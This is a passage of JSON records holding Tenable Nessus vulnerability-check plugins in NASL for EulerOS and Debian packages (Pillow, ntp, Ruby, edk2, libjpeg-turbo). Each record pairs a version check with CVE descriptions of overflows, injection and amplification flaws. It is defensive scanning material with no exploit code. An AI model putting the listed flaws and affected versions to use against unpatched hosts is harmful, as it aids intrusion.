script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libjpeg-turbo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"libjpeg-turbo-1.2.90-6.h5\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjpeg-turbo\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-05-08T16:49:39", "bulletinFamily": "scanner", "description": "According to the versions of the python-pillow package installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - Integer overflow in the ImagingResampleHorizontal\n function in libImaging/Resample.c in Pillow before\n 3.1.1 allows remote attackers to have unspecified\n impact via negative values of the new size, which\n triggers a heap-based buffer overflow.(CVE-2016-4009)\n\n - An issue was discovered in urllib2 in Python 2.x\n through 2.7.17 and urllib in Python 3.x through 3.8.0.\n CRLF injection is possible if the attacker controls a\n url parameter, as demonstrated by the first argument to\n urllib.request.urlopen with \\r\\n (specifically in the\n host component of a URL) followed by an HTTP header.\n This is similar to the CVE-2019-9740 query string issue\n and the CVE-2019-9947 path string issue. (This is not\n exploitable when glibc has CVE-2016-10739\n fixed.)(CVE-2014-3589)\n\n - Python Image Library (PIL) 1.1.7 and earlier and Pillow\n 2.3 might allow remote attackers to execute arbitrary\n commands via shell metacharacters in unspecified\n vectors related to CVE-2014-1932, possibly\n JpegImagePlugin.py.(CVE-2014-3007)\n\n - The documentation XML-RPC server in Python through\n 2.7.16, 3.x through 3.6.9, and 3.7.x through 3.7.4 has\n XSS via the server_title field. This occurs in\n Lib/DocXMLRPCServer.py in Python 2.x, and in\n Lib/xmlrpc/server.py in Python 3.x. If set_server_title\n is called with untrusted input, arbitrary JavaScript\n can be delivered to clients that visit the http URL for\n this server.(CVE-2014-1933)\n\n - Directory traversal vulnerability in the (1) extract\n and (2) extractall functions in the tarfile module in\n Python allows user-assisted remote attackers to\n overwrite arbitrary files via a .. (dot dot) sequence\n in filenames in a TAR archive, a related issue to\n CVE-2001-1267.(CVE-2014-1932)\n\n - An issue was discovered in Pillow before 6.2.0. When\n reading specially crafted invalid image files, the\n library can either allocate very large amounts of\n memory or take an extremely long period of time to\n process the image.(CVE-2019-16865)\n\n - libImaging/FliDecode.c in Pillow before 6.2.2 has an\n FLI buffer overflow.(CVE-2020-5313)\n\n - libImaging/PcxDecode.c in Pillow before 6.2.2 has a PCX\n P mode buffer overflow.(CVE-2020-5312)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-05-01T00:00:00", "id": "EULEROS_SA-2020-1532.NASL", "href": "https://www.tenable.com/plugins/nessus/136235", "published": "2020-05-01T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.2.0 : python-pillow (EulerOS-SA-2020-1532)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136235);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/07\");\n\n script_cve_id(\n \"CVE-2014-1932\",\n \"CVE-2014-1933\",\n \"CVE-2014-3007\",\n \"CVE-2014-3589\",\n \"CVE-2016-4009\",\n \"CVE-2019-16865\",\n \"CVE-2020-5312\",\n \"CVE-2020-5313\"\n );\n script_bugtraq_id(\n 65511,\n 65513,\n 67150,\n 69352\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.2.0 : python-pillow (EulerOS-SA-2020-1532)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the python-pillow package installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - Integer overflow in the ImagingResampleHorizontal\n function in libImaging/Resample.c in Pillow before\n 3.1.1 allows remote attackers to have unspecified\n impact via negative values of the new size, which\n triggers a heap-based buffer overflow.(CVE-2016-4009)\n\n - An issue was discovered in urllib2 in Python 2.x\n through 2.7.17 and urllib in Python 3.x through 3.8.0.\n CRLF injection is possible if the attacker controls a\n url parameter, as demonstrated by the first argument to\n urllib.request.urlopen with \\r\\n (specifically in the\n host component of a URL) followed by an HTTP header.\n This is similar to the CVE-2019-9740 query string issue\n and the CVE-2019-9947 path string issue. (This is not\n exploitable when glibc has CVE-2016-10739\n fixed.)(CVE-2014-3589)\n\n - Python Image Library (PIL) 1.1.7 and earlier and Pillow\n 2.3 might allow remote attackers to execute arbitrary\n commands via shell metacharacters in unspecified\n vectors related to CVE-2014-1932, possibly\n JpegImagePlugin.py.(CVE-2014-3007)\n\n - The documentation XML-RPC server in Python through\n 2.7.16, 3.x through 3.6.9, and 3.7.x through 3.7.4 has\n XSS via the server_title field. This occurs in\n Lib/DocXMLRPCServer.py in Python 2.x, and in\n Lib/xmlrpc/server.py in Python 3.x. If set_server_title\n is called with untrusted input, arbitrary JavaScript\n can be delivered to clients that visit the http URL for\n this server.(CVE-2014-1933)\n\n - Directory traversal vulnerability in the (1) extract\n and (2) extractall functions in the tarfile module in\n Python allows user-assisted remote attackers to\n overwrite arbitrary files via a .. (dot dot) sequence\n in filenames in a TAR archive, a related issue to\n CVE-2001-1267.(CVE-2014-1932)\n\n - An issue was discovered in Pillow before 6.2.0. When\n reading specially crafted invalid image files, the\n library can either allocate very large amounts of\n memory or take an extremely long period of time to\n process the image.(CVE-2019-16865)\n\n - libImaging/FliDecode.c in Pillow before 6.2.2 has an\n FLI buffer overflow.(CVE-2020-5313)\n\n - libImaging/PcxDecode.c in Pillow before 6.2.2 has a PCX\n P mode buffer overflow.(CVE-2020-5312)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1532\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f1ea3d72\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected python-pillow packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4009\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-pillow\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"python-pillow-2.0.0-19.h6.gitd1c6db8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-pillow\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-15T17:11:08", "bulletinFamily": "scanner", "description": "The JSON gem through 2.2.0 for Ruby, as used in Ruby 2.1 has an unsafe\nobject creation vulnerability. This is quite similar to CVE-2013-0269,\nbut does not rely on poor garbage-collection behavior within Ruby.\nSpecifically, use of JSON parsing methods can lead to creation of a\nmalicious object within the interpreter, with adverse effects that are\napplication-dependent.\n\nFor Debian 8 ", "modified": "2020-05-01T00:00:00", "id": "DEBIAN_DLA-2192.NASL", "href": "https://www.tenable.com/plugins/nessus/136202", "published": "2020-05-01T00:00:00", "title": "Debian DLA-2192-1 : ruby2.1 security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2192-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136202);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/13\");\n\n script_cve_id(\"CVE-2020-10663\");\n\n script_name(english:\"Debian DLA-2192-1 : ruby2.1 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The JSON gem through 2.2.0 for Ruby, as used in Ruby 2.1 has an unsafe\nobject creation vulnerability. This is quite similar to CVE-2013-0269,\nbut does not rely on poor garbage-collection behavior within Ruby.\nSpecifically, use of JSON parsing methods can lead to creation of a\nmalicious object within the interpreter, with adverse effects that are\napplication-dependent.\n\nFor Debian 8 'Jessie', this problem has been fixed in version\n2.1.5-2+deb8u10.\n\nWe recommend that you upgrade your ruby2.1 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/04/msg00030.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/ruby2.1\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libruby2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libruby2.1\", reference:\"2.1.5-2+deb8u10\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1\", reference:\"2.1.5-2+deb8u10\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1-dev\", reference:\"2.1.5-2+deb8u10\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1-doc\", reference:\"2.1.5-2+deb8u10\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1-tcltk\", reference:\"2.1.5-2+deb8u10\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-05-08T16:49:47", "bulletinFamily": "scanner", "description": "According to the versions of the ntp packages installed, the EulerOS\nVirtualization for ARM 64 installation on the remote host is affected\nby the following vulnerabilities :\n\n - The monlist feature in ntp_request.c in ntpd in NTP\n before 4.2.7p26 allows remote attackers to cause a\n denial of service (traffic amplification) via forged\n (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests,\n as exploited in the wild in December\n 2013.(CVE-2013-5211)\n\n - The broadcast mode replay prevention functionality in\n ntpd in NTP before 4.2.8p9 allows remote attackers to\n cause a denial of service (reject broadcast mode\n packets) via a crafted broadcast mode\n packet.(CVE-2016-7427)\n\n - ntpd in NTP before 4.2.8p9 allows remote attackers to\n cause a denial of service (reject broadcast mode\n packets) via the poll interval in a broadcast\n packet.(CVE-2016-7428)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-05-01T00:00:00", "id": "EULEROS_SA-2020-1547.NASL", "href": "https://www.tenable.com/plugins/nessus/136250", "published": "2020-05-01T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.2.0 : ntp (EulerOS-SA-2020-1547)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136250);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/07\");\n\n script_cve_id(\n \"CVE-2013-5211\",\n \"CVE-2016-7427\",\n \"CVE-2016-7428\"\n );\n script_bugtraq_id(\n 64692\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.2.0 : ntp (EulerOS-SA-2020-1547)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ntp packages installed, the EulerOS\nVirtualization for ARM 64 installation on the remote host is affected\nby the following vulnerabilities :\n\n - The monlist feature in ntp_request.c in ntpd in NTP\n before 4.2.7p26 allows remote attackers to cause a\n denial of service (traffic amplification) via forged\n (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests,\n as exploited in the wild in December\n 2013.(CVE-2013-5211)\n\n - The broadcast mode replay prevention functionality in\n ntpd in NTP before 4.2.8p9 allows remote attackers to\n cause a denial of service (reject broadcast mode\n packets) via a crafted broadcast mode\n packet.(CVE-2016-7427)\n\n - ntpd in NTP before 4.2.8p9 allows remote attackers to\n cause a denial of service (reject broadcast mode\n packets) via the poll interval in a broadcast\n packet.(CVE-2016-7428)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1547\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bfe5fbf2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"ntp-4.2.6p5-28.h15\",\n \"ntpdate-4.2.6p5-28.h15\",\n \"sntp-4.2.6p5-28.h15\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-05-08T16:49:57", "bulletinFamily": "scanner", "description": "According to the versions of the edk2 package installed, the EulerOS\nVirtualization for ARM 64 installation on the remote host is affected\nby the following vulnerabilities :\n\n - Buffer overflow in the socket.recvfrom_into function in\n Modules/socketmodule.c in Python 2.5 before 2.7.7, 3.x\n before 3.3.4, and 3.4.x before 3.4rc1 allows remote\n attackers to execute arbitrary code via a crafted\n string.(CVE-2014-1912)\n\n - ** RESERVED ** This candidate has been reserved by an\n organization or individual that will use it when\n announcing a new security problem. When the candidate\n has been publicized, the details for this candidate\n will be provided.(CVE-2019-14575)\n\n - ** RESERVED ** This candidate has been reserved by an\n organization or individual that will use it when\n announcing a new security problem. When the candidate\n has been publicized, the details for this candidate\n will be provided.(CVE-2019-14559)\n\n - ** RESERVED ** This candidate has been reserved by an\n organization or individual that will use it when\n announcing a new security problem. When the candidate\n has been publicized, the details for this candidate\n will be provided.(CVE-2019-14563)\n\n - ** RESERVED ** This candidate has been reserved by an\n organization or individual that will use it when\n announcing a new security problem. When the candidate\n has been publicized, the details for this candidate\n will be provided.(CVE-2019-14553)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-05-01T00:00:00", "id": "EULEROS_SA-2020-1574.NASL", "href": "https://www.tenable.com/plugins/nessus/136277", "published": "2020-05-01T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.2.0 : edk2 (EulerOS-SA-2020-1574)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136277);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/07\");\n\n script_cve_id(\n \"CVE-2014-1912\",\n \"CVE-2019-14553\",\n \"CVE-2019-14559\",\n \"CVE-2019-14563\",\n \"CVE-2019-14575\"\n );\n script_bugtraq_id(\n 65379\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.2.0 : edk2 (EulerOS-SA-2020-1574)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the edk2 package installed, the EulerOS\nVirtualization for ARM 64 installation on the remote host is affected\nby the following vulnerabilities :\n\n - Buffer overflow in the socket.recvfrom_into function in\n Modules/socketmodule.c in Python 2.5 before 2.7.7, 3.x\n before 3.3.4, and 3.4.x before 3.4rc1 allows remote\n attackers to execute arbitrary code via a crafted\n string.(CVE-2014-1912)\n\n - ** RESERVED ** This candidate has been reserved by an\n organization or individual that will use it when\n announcing a new security problem. When the candidate\n has been publicized, the details for this candidate\n will be provided.(CVE-2019-14575)\n\n - ** RESERVED ** This candidate has been reserved by an\n organization or individual that will use it when\n announcing a new security problem. When the candidate\n has been publicized, the details for this candidate\n will be provided.(CVE-2019-14559)\n\n - ** RESERVED ** This candidate has been reserved by an\n organization or individual that will use it when\n announcing a new security problem. When the candidate\n has been publicized, the details for this candidate\n will be provided.(CVE-2019-14563)\n\n - ** RESERVED ** This candidate has been reserved by an\n organization or individual that will use it when\n announcing a new security problem. When the candidate\n has been publicized, the details for this candidate\n will be provided.(CVE-2019-14553)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1574\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?485b995d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected edk2 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:edk2-aarch64\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 